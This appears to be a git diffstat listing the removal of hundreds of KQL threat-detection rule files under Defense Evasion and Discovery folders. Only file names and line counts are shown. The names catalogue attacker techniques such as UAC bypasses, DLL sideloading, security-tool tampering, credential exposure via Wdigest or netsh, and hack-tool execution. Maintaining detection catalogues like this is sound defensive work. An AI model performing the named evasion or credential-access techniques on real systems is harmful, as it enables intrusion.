...l_Obfuscated_Ordinal_Call_Via_Rundll32.kql | 7 - ...word_Spraying_Attempt_Using_Dsacls.EXE.kql | 7 - ...ial_PendingFileRenameOperations_Tamper.kql | 7 - ...ersistence_Via_Custom_Protocol_Handler.kql | 7 - ...ersistence_Via_Event_Viewer_Events.asp.kql | 7 - .../Potential_Persistence_Via_GlobalFlags.kql | 7 - ...al_PowerShell_Command_Line_Obfuscation.kql | 7 - .../Potential_PowerShell_Downgrade_Attack.kql | 7 - ..._PowerShell_Execution_Policy_Tampering.kql | 7 - ...cution_Policy_Tampering_-_ProcCreation.kql | 7 - ...Potential_PowerShell_Execution_Via_DLL.kql | 9 - ...hell_Obfuscation_Via_Reversed_Commands.kql | 7 - ...ntial_PowerShell_Obfuscation_Via_WCHAR.kql | 7 - ...al_PrintNightmare_Exploitation_Attempt.kql | 7 - ...ation_Attempt_Via_.Exe.Local_Technique.kql | 7 - ..._Execution_Proxy_Via_CL_Invocation.ps1.kql | 7 - ...tential_Process_Injection_Via_Msra.EXE.kql | 7 - ...y_Key_Abuse_For_Binary_Proxy_Execution.kql | 7 - ...Abuse_For_Binary_Proxy_Execution_-_REG.kql | 7 - 
...aunch.EXE_Binary_Proxy_Execution_Abuse.kql | 7 - .../Potential_Qakbot_Registry_Activity.kql | 7 - ...thorized_MBR_Tampering_Via_Bcdedit.EXE.kql | 7 - .../Potential_Rcdll.DLL_Sideloading.kql | 7 - ...ger_Content_Execution_Via_WerFault.EXE.kql | 7 - ...ntial_Register_App.Vbs_LOLScript_Abuse.kql | 7 - ...tial_Regsvr32_Commandline_Flag_Anomaly.kql | 7 - ....DLL_Sideloading_From_Default_Location.kql | 7 - ..._Sideloading_From_Non-Default_Location.kql | 7 - .../Potential_RoboForm.DLL_Sideloading.kql | 7 - ...dll32_Execution_With_DLL_Stored_In_ADS.kql | 7 - ...xy_Execution_Via_CL_Mutexverifiers.ps1.kql | 7 - ..._ShellDispatch.DLL_Functionality_Abuse.kql | 7 - ...otential_ShellDispatch.DLL_Sideloading.kql | 7 - ..._Bypass_Via_Windows_Developer_Features.kql | 7 - ..._Windows_Developer_Features_-_Registry.kql | 7 - .../Potential_SmadHook.DLL_Sideloading.kql | 7 - ...ential_SolidPDFCreator.DLL_Sideloading.kql | 7 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ...Potential_Suspicious_Mofcomp_Execution.kql | 10 - ...ous_Registry_File_Imported_Via_Reg.EXE.kql | 7 - ...Windows_Feature_Enabled_-_ProcCreation.kql | 9 - ...otential_SysInternals_ProcDump_Evasion.kql | 7 - ..._Sideloading_From_Non_System_Locations.kql | 7 - ..._RDP_Related_Registry_Keys_Via_Reg.EXE.kql | 7 - ...pering_With_Security_Products_Via_WMIC.kql | 7 - .../Potential_UAC_Bypass_Via_Sdclt.EXE.kql | 7 - .../Potential_Vivaldi_elf.DLL_Sideloading.kql | 7 - .../Potential_WWlib.DLL_Sideloading.kql | 7 - .../Potential_Waveedit.DLL_Sideloading.kql | 7 - ...azuh_Security_Platform_DLL_Sideloading.kql | 7 - ...t_ReflectDebugger_Registry_Value_Abuse.kql | 7 - .../Potential_Winnti_Dropper_Activity.kql | 7 - .../Potential_appverifUI.DLL_Sideloading.kql | 7 - ...e_Permissions_Granted_Using_Dsacls.EXE.kql | 7 - ...ASP.NET_Compilation_Via_AspNetCompiler.kql | 7 - ...y_Suspicious_CMD_Shell_Output_Redirect.kql | 9 - ...ally_Suspicious_Cabinet_File_Expansion.kql | 7 - ...ous_Call_To_Win32_NTEventlogFile_Class.kql | 7 - 
...Child_Process_Of_ClickOnce_Application.kql | 7 - ...icious_Child_Process_Of_DiskShadow.EXE.kql | 7 - ...y_Suspicious_Child_Process_Of_Regsvr32.kql | 7 - ...lly_Suspicious_Child_Process_Of_VsCode.kql | 7 - ...ious_Child_Process_of_KeyScrambler.exe.kql | 7 - ...icious_DLL_Registered_Via_Odbcconf.EXE.kql | 7 - ...esktop_Background_Change_Using_Reg.EXE.kql | 9 - ...Desktop_Background_Change_Via_Registry.kql | 9 - ..._Suspicious_Event_Viewer_Child_Process.kql | 7 - ..._Suspicious_GoogleUpdate_Child_Process.kql | 7 - ...ocument_Executed_From_Trusted_Location.kql | 7 - ...ly_Suspicious_Regsvr32_HTTP_IP_Pattern.kql | 7 - ...tentially_Suspicious_Rundll32_Activity.kql | 7 - ...tially_Suspicious_Windows_App_Activity.kql | 7 - ..._Suspicious_Wuauclt_Network_Connection.kql | 9 - ...Base64_Encoded_FromBase64String_Cmdlet.kql | 7 - ...werShell_Base64_Encoded_Invoke_Keyword.kql | 7 - ...ase64_Encoded_Reflective_Assembly_Load.kql | 7 - .../PowerShell_Base64_Encoded_WMI_Classes.kql | 7 - ...owerShell_Console_History_Logs_Deleted.kql | 7 - ...Core_DLL_Loaded_Via_Office_Application.kql | 7 - ...ng_Disabled_Via_Registry_Key_Tampering.kql | 7 - ...l_Script_Change_Permission_Via_Set-Acl.kql | 7 - .../PowerShell_Set-Acl_On_Windows_Folder.kql | 7 - ...ell_Base64_Encoded_MpPreference_Cmdlet.kql | 7 - ...wershell_Defender_Disable_Scan_Feature.kql | 7 - .../Powershell_Defender_Exclusion.kql | 7 - ...l_Token_Obfuscation_-_Process_Creation.kql | 7 - Defense Evasion/Powerup_Write_Hijack_DLL.kql | 10 - Defense Evasion/Prefetch_File_Deleted.kql | 7 - .../PrintBrm_ZIP_Creation_of_Extraction.kql | 7 - Defense Evasion/Procdump_Execution.kql | 7 - ...ss_Access_via_TrolleyExpress_Exclusion.kql | 7 - ...rocess_Creation_Using_Sysnative_Folder.kql | 7 - .../Process_Memory_Dump_Via_Comsvcs.DLL.kql | 7 - .../Process_Memory_Dump_Via_Dotnet-Dump.kql | 8 - ...ocess_Proxy_Execution_Via_Squirrel.EXE.kql | 8 - .../Proxy_Execution_Via_Explorer.exe.kql | 7 - .../Proxy_Execution_Via_Wuauclt.EXE.kql | 7 - 
...nt_File_Dropped_In_Suspicious_Location.kql | 7 - .../Pubprn.vbs_Proxy_Execution.kql | 7 - ...ython_Image_Load_By_Non-Python_Process.kql | 7 - .../RDP_Connection_Allowed_Via_Netsh.EXE.kql | 7 - ...e_Creation_From_Suspicious_Application.kql | 7 - ...rt_Forwarding_Rule_Added_Via_Netsh.EXE.kql | 7 - .../RDP_Sensitive_Settings_Changed.kql | 9 - ...RDP_Sensitive_Settings_Changed_to_Zero.kql | 9 - .../REGISTER_APP.VBS_Proxy_Execution.kql | 7 - Defense Evasion/Raccine_Uninstall.kql | 7 - ..._Winnti_Playbook_Registry_Manipulation.kql | 7 - ...iating_Network_Connection_To_Public_IP.kql | 7 - Defense Evasion/Reg_Add_Suspicious_Paths.kql | 7 - .../Registry_Explorer_Policy_Modification.kql | 7 - .../Registry_Hide_Function_from_User.kql | 7 - .../Registry_Modification_Via_Regini.EXE.kql | 7 - ...y_Persistence_via_Service_in_Safe_Mode.kql | 7 - ...ecution_With_Suspicious_File_Extension.kql | 7 - ..._DLL_Execution_With_Uncommon_Extension.kql | 7 - ...cution_From_Highly_Suspicious_Location.kql | 7 - ...ion_From_Potential_Suspicious_Location.kql | 7 - ...ablement_Abuse_Via_AtomicTestHarnesses.kql | 7 - ..._RURAT_Execution_From_Unusual_Location.kql | 7 - .../Remote_Code_Execute_via_Winrm.vbs.kql | 7 - .../Remote_File_Download_Via_Findstr.EXE.kql | 8 - .../Remote_XSL_Execution_Via_Msxsl.EXE.kql | 7 - ...Hosted_HTA_File_Executed_Via_Mshta.EXE.kql | 7 - ...Removal_Of_AMSI_Provider_Registry_Keys.kql | 7 - ...Value_to_Hide_Schedule_Task_-_Registry.kql | 7 - ...Value_to_Hide_Schedule_Task_-_Registry.kql | 7 - ..._Potential_COM_Hijacking_Registry_Keys.kql | 9 - .../Renamed_AutoHotkey.EXE_Execution.kql | 7 - .../Renamed_CURL.EXE_Execution.kql | 7 - .../Renamed_CreateDump_Utility_Execution.kql | 7 - Defense Evasion/Renamed_FTP.EXE_Execution.kql | 7 - .../Renamed_Jusched.EXE_Execution.kql | 7 - .../Renamed_Mavinject.EXE_Execution.kql | 7 - .../Renamed_MegaSync_Execution.kql | 7 - .../Renamed_Msdt.EXE_Execution.kql | 7 - .../Renamed_NirCmd.EXE_Execution.kql | 7 - 
.../Renamed_Office_Binary_Execution.kql | 7 - .../Renamed_PingCastle_Binary_Execution.kql | 7 - Defense Evasion/Renamed_Plink_Execution.kql | 7 - .../Renamed_ProcDump_Execution.kql | 7 - ...Remote_Utilities_RAT_(RURAT)_Execution.kql | 7 - .../Renamed_Vmnat.exe_Execution.kql | 7 - ...sponse_File_Execution_Via_Odbcconf.EXE.kql | 7 - ...ctedAdminMode_Registry_Value_Tampering.kql | 10 - ...egistry_Value_Tampering_-_ProcCreation.kql | 10 - ...tificate_Installed_From_Susp_Locations.kql | 7 - .../RunDLL32_Spawning_Explorer.kql | 7 - ...un_Once_Task_Configuration_in_Registry.kql | 7 - ...sk_Execution_as_Configured_in_Registry.kql | 7 - .../Run_PowerShell_Script_from_ADS.kql | 7 - ...ll_Script_from_Redirected_Input_Stream.kql | 7 - ..._Execution_With_Uncommon_DLL_Extension.kql | 7 - ...ecution_Without_CommandLine_Parameters.kql | 7 - .../Rundll32_InstallScreenSaver_Execution.kql | 7 - .../Rundll32_Internet_Connection.kql | 7 - .../Rundll32_Spawned_Via_Explorer.EXE.kql | 7 - .../Rundll32_UNC_Path_Execution.kql | 7 - Defense Evasion/SCR_File_Write_Event.kql | 7 - ...ent_Tools_PowerShell_Session_Detection.kql | 9 - ...eBoot_Registry_Key_Deleted_Via_Reg.EXE.kql | 7 - .../ScreenSaver_Registry_Key_Set.kql | 7 - ...tics_Turn_Off_Check_Enabled_-_Registry.kql | 7 - ...nhost_Calling_Suspicious_Child_Process.kql | 7 - .../Security_Service_Disabled_Via_Reg.EXE.kql | 7 - ...E_From_Potentially_Suspicious_Location.kql | 9 - ...ted_In_Potentially_Suspicious_Location.kql | 10 - .../Service_Binary_in_Suspicious_Folder.kql | 7 - ...DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql | 7 - ...rvice_Registry_Key_Deleted_Via_Reg.EXE.kql | 7 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - ...Type_Change_Via_PowerShell_Set-Service.kql | 7 - .../Service_StartupType_Change_Via_Sc.EXE.kql | 7 - ...Files_as_System_Files_Using_Attrib.EXE.kql | 8 - ...tion_Using_Operating_Systems_Utilities.kql | 7 - ..._DLL_Execution_in_Suspicious_Directory.kql | 7 - .../Shell_Open_Registry_Keys_Manipulation.kql | 7 - 
Defense Evasion/ShimCache_Flush.kql | 7 - Defense Evasion/Sideloading_Link.EXE.kql | 7 - .../Start_of_NT_Virtual_DOS_Machine.kql | 7 - Defense Evasion/Suspect_Svchost_Activity.kql | 7 - ...spicious_Advpack_Call_Via_Rundll32.EXE.kql | 7 - ...ous_AgentExecutor_PowerShell_Execution.kql | 7 - ...lication_Allowed_Through_Exploit_Guard.kql | 7 - ...us_Cabinet_File_Execution_Via_Msdt.EXE.kql | 7 - .../Suspicious_Calculator_Usage.kql | 8 - .../Suspicious_Call_by_Ordinal.kql | 7 - ...Suspicious_Child_Process_Of_BgInfo.EXE.kql | 7 - ...Suspicious_Child_Process_Of_Wermgr.EXE.kql | 7 - ...icious_Child_Process_of_AspNetCompiler.kql | 7 - .../Suspicious_CodePage_Switch_Via_CHCP.kql | 7 - .../Suspicious_Control_Panel_DLL_Load.kql | 7 - ...cious_Copy_From_or_To_System_Directory.kql | 9 - .../Suspicious_Creation_with_Colorcpl.kql | 7 - Defense Evasion/Suspicious_Csi.exe_Usage.kql | 7 - .../Suspicious_CustomShellHost_Execution.kql | 7 - .../Suspicious_DLL_Loaded_via_CertOC.EXE.kql | 7 - ...Diantz_Alternate_Data_Stream_Execution.kql | 7 - .../Suspicious_Double_Extension_Files.kql | 7 - ..._Download_From_Direct_IP_Via_Bitsadmin.kql | 7 - ...rom_File-Sharing_Website_Via_Bitsadmin.kql | 7 - .../Suspicious_Download_Via_Certutil.EXE.kql | 7 - .../Suspicious_DumpMinitool_Execution.kql | 7 - ...Reflection_Assembly_Load_Function_Call.kql | 7 - ...vironment_Variable_Has_Been_Registered.kql | 7 - ...Eventlog_Clear_or_Configuration_Change.kql | 7 - .../Suspicious_Executable_File_Creation.kql | 9 - ..._Execution_From_GUID_Like_Folder_Names.kql | 7 - ...s_Execution_of_InstallUtil_Without_Log.kql | 7 - .../Suspicious_Extexport_Execution.kql | 7 - ...trac32_Alternate_Data_Stream_Execution.kql | 7 - ...s_File_Created_Via_OneNote_Application.kql | 7 - ..._Activity_From_Fake_Recycle.Bin_Folder.kql | 7 - ...le_Creation_In_Uncommon_AppData_Folder.kql | 7 - ...loaded_From_Direct_IP_Via_Certutil.EXE.kql | 7 - ..._File-Sharing_Website_Via_Certutil.EXE.kql | 7 - ...ile_Encoded_To_Base64_Via_Certutil.EXE.kql 
| 7 - ...Suspicious_Files_in_Default_GPO_Folder.kql | 7 - Defense Evasion/Suspicious_GUP_Usage.kql | 7 - .../Suspicious_Get-Variable.exe_Creation.kql | 10 - .../Suspicious_HH.EXE_Execution.kql | 7 - ...h_IntegrityLevel_Conhost_Legacy_Option.kql | 7 - ...IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql | 7 - ...ous_JavaScript_Execution_Via_Mshta.EXE.kql | 7 - ...ious_LNK_Double_Extension_File_Created.kql | 8 - .../Suspicious_MSDT_Parent_Process.kql | 7 - .../Suspicious_MSHTA_Child_Process.kql | 7 - ...picious_Microsoft_Office_Child_Process.kql | 7 - ...d_Execution_By_Uncommon_Parent_Process.kql | 7 - .../Suspicious_MsiExec_Embedding_Parent.kql | 7 - ...spicious_Msiexec_Execute_Arbitrary_DLL.kql | 9 - ...xec_Quiet_Install_From_Remote_Location.kql | 7 - ...twork_Connection_Binary_No_CommandLine.kql | 7 - .../Suspicious_Obfuscated_PowerShell_Code.kql | 7 - ...ous_PROCEXP152.sys_File_Created_In_TMP.kql | 9 - ...Parent_Double_Extension_File_Execution.kql | 7 - ...eyboard_Layout_IME_File_Registry_Value.kql | 10 - ...vocations_-_Specific_-_ProcessCreation.kql | 7 - ...xecution_To_Change_Lock_Screen_Timeout.kql | 7 - ...Execution_From_Fake_Recycle.Bin_Folder.kql | 7 - .../Suspicious_Process_Parents.kql | 7 - .../Suspicious_Process_Start_Locations.kql | 7 - ..._Whitelisted_In_Firewall_Via_Netsh.EXE.kql | 7 - ...uspicious_Provlaunch.EXE_Child_Process.kql | 7 - .../Suspicious_RASdial_Activity.kql | 7 - .../Suspicious_Recursive_Takeown.kql | 7 - ...y_Modification_From_ADS_Via_Regini.EXE.kql | 7 - ...s_Regsvr32_Execution_From_Remote_Share.kql | 7 - ...sponse_File_Execution_Via_Odbcconf.EXE.kql | 7 - ...us_Rundll32_Activity_Invoking_Sys_File.kql | 7 - ...undll32_Execution_With_Image_Extension.kql | 7 - ...ious_Rundll32_Invoking_Inline_VBScript.kql | 7 - ...picious_Rundll32_Setupapi.dll_Activity.kql | 7 - .../Suspicious_Runscripthelper.exe.kql | 7 - ...uspicious_SYSTEM_User_Process_Creation.kql | 7 - ...Task_Creation_via_Masqueraded_XML_File.kql | 7 - 
.../Suspicious_Service_Binary_Directory.kql | 7 - .../Suspicious_Service_Installed.kql | 9 - .../Suspicious_Sigverif_Execution.kql | 7 - .../Suspicious_Splwow64_Without_Params.kql | 7 - .../Suspicious_Usage_Of_ShellExec_RunDLL.kql | 7 - .../Suspicious_Userinit_Child_Process.kql | 7 - .../Suspicious_VBoxDrvInst.exe_Parameters.kql | 10 - ...ous_Volume_Shadow_Copy_VSS_PS.dll_Load.kql | 7 - ...ous_Volume_Shadow_Copy_Vssapi.dll_Load.kql | 7 - ...s_Volume_Shadow_Copy_Vsstrace.dll_Load.kql | 7 - ...t_Command_With_AgentExtensionPath_Load.kql | 7 - ...ious_WMIC_Execution_Via_Office_Process.kql | 7 - ...der_Folder_Exclusion_Added_Via_Reg.EXE.kql | 7 - ...der_Registry_Key_Tampering_Via_Reg.EXE.kql | 7 - .../Suspicious_Windows_Service_Tampering.kql | 7 - ...race_ETW_Session_Tamper_Via_Logman.EXE.kql | 7 - ...ous_Windows_Update_Agent_Empty_Cmdline.kql | 8 - .../Suspicious_WmiPrvSE_Child_Process.kql | 7 - ...cious_Workstation_Locking_via_Rundll32.kql | 7 - ...ious_X509Enrollment_-_Process_Creation.kql | 7 - ...picious_XOR_Encoded_PowerShell_Command.kql | 7 - .../Suspicious_ZipExec_Execution.kql | 7 - ...rver_Execute_Arbitrary_PowerShell_Code.kql | 7 - ..._VBS_Execute_Arbitrary_PowerShell_Code.kql | 7 - ...ternals_PsSuspend_Suspicious_Execution.kql | 7 - .../Sysmon_Configuration_Update.kql | 7 - .../Sysmon_Driver_Altitude_Change.kql | 9 - .../Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql | 7 - ...nel_Item_Loaded_From_Uncommon_Location.kql | 7 - ...System_File_Execution_Location_Anomaly.kql | 7 - ...r_Windows_Defender_Remove-MpPreference.kql | 7 - .../Tamper_With_Sophos_AV_Registry_Keys.kql | 7 - .../Taskkill_Symantec_Endpoint_Protection.kql | 10 - Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql | 7 - Defense Evasion/Tasks_Folder_Evasion.kql | 10 - .../TeamViewer_Log_File_Deleted.kql | 7 - ..._Connection_History_Cleared_-_Registry.kql | 7 - .../Third_Party_Software_DLL_Sideloading.kql | 7 - .../Time_Travel_Debugging_Utility_Usage.kql | 7 - ...Travel_Debugging_Utility_Usage_-_Image.kql | 7 
- .../Tomcat_WebServer_Logs_Deleted.kql | 7 - ...rust_Access_Disable_For_VBApplications.kql | 7 - .../TrustedPath_UAC_Bypass_Pattern.kql | 7 - ...ass_Abusing_Winsat_Path_Parsing_-_File.kql | 7 - ..._Abusing_Winsat_Path_Parsing_-_Process.kql | 7 - ...Abusing_Winsat_Path_Parsing_-_Registry.kql | 7 - ...AC_Bypass_Tools_Using_ComputerDefaults.kql | 7 - ...Bypass_Using_.NET_Code_Profiler_on_MMC.kql | 7 - .../UAC_Bypass_Using_ChangePK_and_SLUI.kql | 7 - ...pass_Using_Consent_and_Comctl32_-_File.kql | 7 - ...s_Using_Consent_and_Comctl32_-_Process.kql | 7 - .../UAC_Bypass_Using_Disk_Cleanup.kql | 7 - Defense Evasion/UAC_Bypass_Using_DismHost.kql | 7 - Defense Evasion/UAC_Bypass_Using_EventVwr.kql | 7 - ..._Bypass_Using_Event_Viewer_RecentViews.kql | 7 - .../UAC_Bypass_Using_IDiagnostic_Profile.kql | 7 - ...ypass_Using_IDiagnostic_Profile_-_File.kql | 7 - .../UAC_Bypass_Using_IEInstal_-_File.kql | 7 - .../UAC_Bypass_Using_IEInstal_-_Process.kql | 7 - .../UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql | 7 - ...ing_MSConfig_Token_Modification_-_File.kql | 7 - ..._MSConfig_Token_Modification_-_Process.kql | 7 - ...Bypass_Using_NTFS_Reparse_Point_-_File.kql | 7 - ...ass_Using_NTFS_Reparse_Point_-_Process.kql | 7 - .../UAC_Bypass_Using_PkgMgr_and_DISM.kql | 7 - ...pass_Using_Windows_Media_Player_-_File.kql | 7 - ...s_Using_Windows_Media_Player_-_Process.kql | 7 - ..._Using_Windows_Media_Player_-_Registry.kql | 7 - Defense Evasion/UAC_Bypass_Via_Wsreset.kql | 7 - Defense Evasion/UAC_Bypass_WSReset.kql | 7 - Defense Evasion/UAC_Bypass_With_Fake_DLL.kql | 7 - .../UAC_Bypass_via_Event_Viewer.kql | 7 - Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql | 7 - Defense Evasion/UAC_Bypass_via_Sdclt.kql | 7 - Defense Evasion/UAC_Disabled.kql | 8 - Defense Evasion/UAC_Notification_Disabled.kql | 10 - .../UAC_Secure_Desktop_Prompt_Disabled.kql | 10 - ..._Persistence_Via_Wpbbin_-_FileCreation.kql | 7 - ...rsistence_Via_Wpbbin_-_ProcessCreation.kql | 7 - ...on_AddinUtil.EXE_CommandLine_Execution.kql | 
8 - ...ncommon_Child_Process_Of_AddinUtil.EXE.kql | 8 - .../Uncommon_Child_Process_Of_Appvlp.EXE.kql | 11 - .../Uncommon_Child_Process_Of_BgInfo.EXE.kql | 7 - ...ommon_Child_Process_Of_Defaultpack.EXE.kql | 7 - ..._Child_Process_Spawned_By_Odbcconf.EXE.kql | 7 - ...eyboard_Layout_IME_File_Registry_Value.kql | 10 - ..._FileSystem_Load_Attempt_By_Format.com.kql | 8 - ..._File_Creation_By_Mysql_Daemon_Process.kql | 9 - ...icrosoft_Office_Trusted_Location_Added.kql | 7 - .../Uncommon_Svchost_Parent_Process.kql | 7 - ...pplications_Execution_Via_AtBroker.EXE.kql | 7 - .../Uninstall_Crowdstrike_Falcon_Sensor.kql | 7 - .../Uninstall_Sysinternals_Sysmon.kql | 7 - Defense Evasion/Unmount_Share_Via_Net.EXE.kql | 7 - ...allation_Attempt_Using_Add-AppxPackage.kql | 7 - .../Use_Icacls_to_Hide_File_to_Everyone.kql | 7 - .../Use_NTFS_Short_Name_in_Command_Line.kql | 7 - .../Use_NTFS_Short_Name_in_Image.kql | 7 - ...Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql | 7 - .../Use_Short_Name_Path_in_Command_Line.kql | 7 - .../Use_Short_Name_Path_in_Image.kql | 7 - Defense Evasion/Use_of_Remote.exe.kql | 7 - Defense Evasion/Use_of_Scriptrunner.exe.kql | 7 - Defense Evasion/Use_of_Setres.exe.kql | 7 - Defense Evasion/Use_of_TTDInject.exe.kql | 7 - .../Use_of_VSIISExeLauncher.exe.kql | 7 - .../Use_of_VisualUiaVerifyNative.exe.kql | 7 - Defense Evasion/Use_of_Wfc.exe.kql | 7 - .../Using_SettingSyncHost.exe_as_LOLBin.kql | 7 - .../UtilityFunctions.ps1_Proxy_Dll.kql | 7 - .../Verclsid.exe_Runs_COM_Object.kql | 7 - ...sual_Basic_Command_Line_Compiler_Usage.kql | 7 - ...PressAnyKey_Arbitrary_Binary_Execution.kql | 7 - ...ejsTools_PressAnyKey_Renamed_Execution.kql | 7 - .../WMIC_Loading_Scripting_Libraries.kql | 7 - Defense Evasion/WSL_Child_Process_Anomaly.kql | 7 - ...ab_Execution_From_Non_Default_Location.kql | 7 - ...digest_CredGuard_Registry_Modification.kql | 10 - .../Wdigest_Enable_UseLogonCredential.kql | 7 - .../Weak_or_Abused_Passwords_In_CLI.kql | 9 - 
...s_Binaries_Write_Suspicious_Extensions.kql | 7 - ...dows_Defender_Definition_Files_Removed.kql | 7 - ...s_Defender_Exclusions_Added_-_Registry.kql | 7 - ...s_Defender_Service_Disabled_-_Registry.kql | 7 - ...ndows_Firewall_Disabled_via_PowerShell.kql | 7 - .../Windows_Kernel_Debugger_Execution.kql | 7 - ..._Processes_Suspicious_Parent_Directory.kql | 7 - ...Spooler_Service_Suspicious_Binary_Load.kql | 7 - .../Winget_Admin_Settings_Modification.kql | 7 - ...inlogon_AllowMultipleTSSessions_Enable.kql | 10 - ...EXE_Uncommon_Argument_Or_Child_Process.kql | 9 - .../Write_Protect_For_Storage_Disabled.kql | 9 - ...Of_Malicious_Files_To_The_Fonts_Folder.kql | 7 - ...mon_Locations_Via_PresentationHost.EXE.kql | 8 - .../XSL_Script_Execution_Via_WMIC.EXE.kql | 10 - ...XE_Execution_From_Non-Default_Location.kql | 9 - ...l_Cmdlets_Execution_-_ProccessCreation.kql | 7 - ...rectory_Structure_Export_Via_Csvde.EXE.kql | 7 - .../Advanced_IP_Scanner_-_File_Event.kql | 7 - Discovery/BloodHound_Collection_Files.kql | 7 - ...y_And_Export_Via_Get-ADComputer_Cmdlet.kql | 7 - ...ter_System_Reconnaissance_Via_Wmic.EXE.kql | 7 - .../Console_CodePage_Lookup_Via_CHCP.kql | 7 - .../Detected_Windows_Software_Discovery.kql | 7 - Discovery/DirLister_Execution.kql | 7 - Discovery/Discovery_of_a_System_Time.kql | 7 - .../Domain_Trust_Discovery_Via_Dsquery.kql | 7 - Discovery/DriverQuery.EXE_Execution.kql | 7 - ...merate_All_Information_With_Whoami.EXE.kql | 7 - ..._SubFolder_Enumeration_Via_Dir_Command.kql | 8 - ..._Configuration_Discovery_Via_Netsh.EXE.kql | 7 - Discovery/Fsutil_Drive_Enumeration.kql | 7 - ...kInfo.VBS_Reconnaissance_Script_Output.kql | 7 - ...esult_Display_Group_Policy_Information.kql | 7 - ...mbership_Reconnaissance_Via_Whoami.EXE.kql | 7 - Discovery/HackTool_-_Certify_Execution.kql | 7 - Discovery/HackTool_-_Certipy_Execution.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - .../HackTool_-_SharpLDAPmonitor_Execution.kql | 7 - 
.../HackTool_-_SharpLdapWhoami_Execution.kql | 7 - Discovery/HackTool_-_SharpView_Execution.kql | 7 - .../HackTool_-_TruffleSnout_Execution.kql | 7 - Discovery/HackTool_-_WinPwn_Execution.kql | 8 - ...ting_Of_Wifi_Credentials_Via_Netsh.EXE.kql | 7 - Discovery/Local_Accounts_Discovery.kql | 7 - ...cal_Groups_Reconnaissance_Via_Wmic.EXE.kql | 11 - ...werShell_Commandlets_-_ProcessCreation.kql | 7 - Discovery/Network_Reconnaissance_Activity.kql | 7 - ...rk_Trace_Capture_Started_Via_Netsh.EXE.kql | 7 - Discovery/Nltest.EXE_Execution.kql | 7 - Discovery/Obfuscated_IP_Download_Activity.kql | 7 - Discovery/Obfuscated_IP_Via_CLI.kql | 7 - .../PUA_-_AdFind_Suspicious_Execution.kql | 7 - Discovery/PUA_-_Adidnsdump_Execution.kql | 9 - .../PUA_-_Advanced_IP_Scanner_Execution.kql | 7 - .../PUA_-_Advanced_Port_Scanner_Execution.kql | 7 - Discovery/PUA_-_Crassus_Execution.kql | 7 - Discovery/PUA_-_Seatbelt_Execution.kql | 7 - .../PUA_-_SoftPerfect_Netscan_Execution.kql | 9 - ...veDirectory_Enumeration_Via_AdFind.EXE.kql | 7 - .../Permission_Check_Via_Accesschk.EXE.kql | 7 - ...eration_Using_AD_Module_-_ProcCreation.kql | 7 - ...And_Service_Reconnaissance_Via_Reg.EXE.kql | 7 - ...tial_Discovery_Activity_Via_Dnscmd.EXE.kql | 7 - ..._Sniffing_Activity_Using_Network_Tools.kql | 10 - ...l_Recon_Activity_Using_DriverQuery.EXE.kql | 7 - ...otential_Recon_Activity_Via_Nltest.EXE.kql | 7 - ...nce_Activity_Via_GatherNetworkInfo.VBS.kql | 7 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ...con_Activity_Using_Log_Query_Utilities.kql | 9 - Discovery/Python_Initiated_Connection.kql | 7 - ...on_Command_Output_Piped_To_Findstr.EXE.kql | 8 - ...Remote_Utilities_RAT_(RURAT)_Execution.kql | 7 - Discovery/Renamed_Whoami_Execution.kql | 7 - ..._Privileges_Enumeration_Via_Whoami.EXE.kql | 7 - ...y_Tools_Keyword_Lookup_Via_Findstr.EXE.kql | 9 - ..._And_Session_Enumeration_Using_Net.EXE.kql | 7 - .../Suspicious_Execution_of_Hostname.kql | 7 - .../Suspicious_Execution_of_Systeminfo.kql | 7 - 
..._Reconnaissance_Activity_Using_Net.EXE.kql | 9 - .../Suspicious_Kernel_Dump_Using_Dtrace.kql | 7 - Discovery/Suspicious_Network_Command.kql | 7 - ...k_Connection_to_IP_Lookup_Service_APIs.kql | 7 - Discovery/Suspicious_Query_of_MachineGUID.kql | 7 - ...vity_Using_Get-LocalGroupMember_Cmdlet.kql | 7 - ...nce_Activity_Via_GatherNetworkInfo.VBS.kql | 7 - Discovery/Suspicious_Scan_Loop_Network.kql | 7 - Discovery/Suspicious_Use_of_PsLogList.kql | 7 - Discovery/Suspicious_Where_Execution.kql | 10 - .../Sysinternals_PsService_Execution.kql | 7 - .../Sysinternals_PsSuspend_Execution.kql | 7 - ...ault_Driver_Altitude_Using_Findstr.EXE.kql | 7 - ...And_Volume_Reconnaissance_Via_Wmic.EXE.kql | 10 - ...work_Connections_Discovery_Via_Net.EXE.kql | 7 - ...tem_Information_Discovery_Via_Wmic.EXE.kql | 11 - Discovery/Use_of_W32tm_as_Timer.kql | 7 - ...overy_And_Export_Via_Get-ADUser_Cmdlet.kql | 7 - Discovery/WhoAmI_as_Parameter.kql | 7 - Discovery/Whoami.EXE_Execution_Anomaly.kql | 7 - ....EXE_Execution_From_Privileged_Process.kql | 7 - ...hoami.EXE_Execution_With_Output_Option.kql | 7 - Discovery/Whoami_Utility_Execution.kql | 7 - ...l_Cmdlets_Execution_-_ProccessCreation.kql | 7 - ...l_Sideloading_From_Suspicious_Location.kql | 7 - ...eros_DLL_Loaded_Via_Office_Application.kql | 7 - ...sing_DLL_Loaded_Via_Office_Application.kql | 7 - ...Add_Insecure_Download_Source_To_Winget.kql | 9 - .../Add_New_Download_Source_To_Winget.kql | 7 - ...spicious_New_Download_Source_To_Winget.kql | 7 - ...ndows_Capability_Via_PowerShell_Cmdlet.kql | 7 - .../Application_Removed_Via_Wmic.EXE.kql | 7 - .../Application_Terminated_Via_Wmic.EXE.kql | 7 - ...ary_Binary_Execution_Using_GUP_Utility.kql | 7 - .../Arbitrary_Command_Execution_Using_WSL.kql | 7 - ...bitrary_File_Download_Via_IMEWDBLD.EXE.kql | 7 - ...ary_File_Download_Via_MSEDGE_PROXY.EXE.kql | 7 - ...bitrary_File_Download_Via_MSOHTMED.EXE.kql | 7 - .../Arbitrary_File_Download_Via_MSPUB.EXE.kql | 7 - 
